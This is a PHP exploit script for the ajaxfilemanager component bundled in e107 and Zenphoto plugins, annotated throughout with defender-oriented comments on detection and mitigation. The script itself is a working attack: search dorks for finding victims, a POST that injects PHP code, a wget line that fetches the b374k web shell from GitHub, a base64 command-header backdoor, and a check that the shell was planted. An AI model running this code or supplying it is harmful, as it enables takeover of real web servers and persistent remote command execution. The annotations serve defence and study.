- <?php
- /*
- dork inurl:/e107_plugins/hupsis_media_gallery/FileManager/ajaxfilemanager
- inurl:/zp-core/zp-extensions/tiny_mce/plugins/ajaxfilemanager/
- use ur brain :p
- */
- error_reporting(0); // run-time setup: hide all PHP errors, warnings and notices
- set_time_limit(0); // no execution time limit for the script
- ini_set("default_socket_timeout", 5); // socket-based streams wait at most 5 seconds
- function http_send($host, $packet) /*
-    Sends one pre-built raw HTTP request and returns the raw reply.
-    $host   - host name or address passed to fsockopen(); the port is fixed at 80, so the traffic is unencrypted.
-    $packet - complete request text (request line, headers, body); written to the socket unchanged.
-    Returns whatever stream_get_contents() reads from the socket, i.e. the unparsed reply.
-    If the connection cannot be opened, the whole script ends through die().
-    For log review: nothing here adds a User-Agent header, so a request carries only the headers present in $packet.
- */
- {
- if (!($sock = fsockopen($host, 80))) // TCP connect; port 80 is hard-coded
- die( "\n[-] No response from {$host}:80\n"); // connection failed: print the message and end the script
- fwrite($sock, $packet); // return value (bytes written) is not checked
- return stream_get_contents($sock); // reads to end of stream; $sock is not closed explicitly
- }
- if ($argc < 3) // argument check: two arguments are required after the script name
- {
- print "\nUsage......: php $argv[0] <host> <ajaxfilemanager_path>\n";
- print "\nExample....: php $argv[0] domain.com /e107_plugins/hupsis_media_gallery/FileManager/ajaxfilemanager/\n";
- die(); // stop before any request is sent
- }
- $host = $argv[1]; // first argument: host used for the socket connection and the Host header
- $path1 = $argv[2]; // second argument: URL path of the ajaxfilemanager directory, prefixed to each request path
- $exploit = "foo=<?php error_reporting(0);print(system('wget https://raw.githubusercontent.com/The404Hacking/b374k-mini/master/b374k.php -O shani.php'));passthru(base64_decode($_SERVER[HTTP_CMD]));die; ?>"; /*
-    POST body: a form field named foo whose value is PHP source text. As written in this literal, the text has parts a defender can key on:
-      1. system() running wget against a raw.githubusercontent.com URL for b374k.php and saving the download as shani.php. b374k is a PHP web shell, so this is the persistence step.
-      2. passthru() over a base64-decoded value; the literal names the Cmd request header (HTTP_CMD) as its source.
-      3. error_reporting(0) at the start and die at the end of the snippet.
-    Detection: request bodies sent to ajax_create_folder.php that contain a PHP open tag; the web server user spawning wget; outbound HTTPS from the web server to raw.githubusercontent.com; a new shani.php next to the plugin's own files.
-    Mitigation: remove the bundled ajaxfilemanager copy or replace it with a fixed build, block direct requests to its PHP files, keep the plugin directory read-only for the web server user, and restrict outbound connections from web hosts.
- */
- $packet = "POST {$path1}/ajax_create_folder.php HTTP/1.0\r\n"; // request 1: POST to ajax_create_folder.php, HTTP/1.0
- $packet .= "Host: {$host}\r\n";
- $packet .= "Content-Length: ".strlen($exploit)."\r\n"; // byte length of the body built above
- $packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
- $packet .= "Connection: close\r\n\r\n{$exploit}"; // blank line ends the headers, then the body follows
- http_send($host, $packet); // reply is discarded
- $packet = "GET {$path1}/inc/data.php HTTP/1.0\r\n"; // request 2: GET of inc/data.php under the same path
- $packet .= "Host: {$host}\r\n";
- $packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
- $packet .= "Connection: close\r\n\r\n";
- http_send($host, $packet); /*
-    Reply is discarded again.
-    NOTE(review): the order of the two requests suggests the POSTed text ends up in inc/data.php and runs when that file is requested; confirm against the plugin source.
-    In access logs the pair appears as a POST to ajax_create_folder.php followed at once by a GET of inc/data.php from the same client, both HTTP/1.0.
- */
- $in = "inc/shani.php"; // file name given to wget -O in the payload, placed under the plugin's inc/ directory
- $ha = "http://";
- $target = $ha.$host.$path1.$in; // URL of the dropped file, built from both command-line arguments
- $cek = file_get_contents($target); /*
-    Third request: a plain HTTP GET of that URL through PHP's http:// stream wrapper.
-    For responders: a successful GET of inc/shani.php under an ajaxfilemanager path in access logs, or that file on disk, indicates the upload step completed on that host.
- */
- print "\n[+] Thanks to Unamed48\n";
- if(preg_match("/File upload by unnamed48/", $cek)) // success test: the fetched page must contain this marker text
- {
- echo "\n\n[+] uploaded XD cek @ http://$host$path1/inc/shani.php\n"; // reports the URL of the dropped file
- }
- else {
- echo "\n\n[-] Exploit Failed :(\n"; // marker not found in the fetched content
- }
- ?>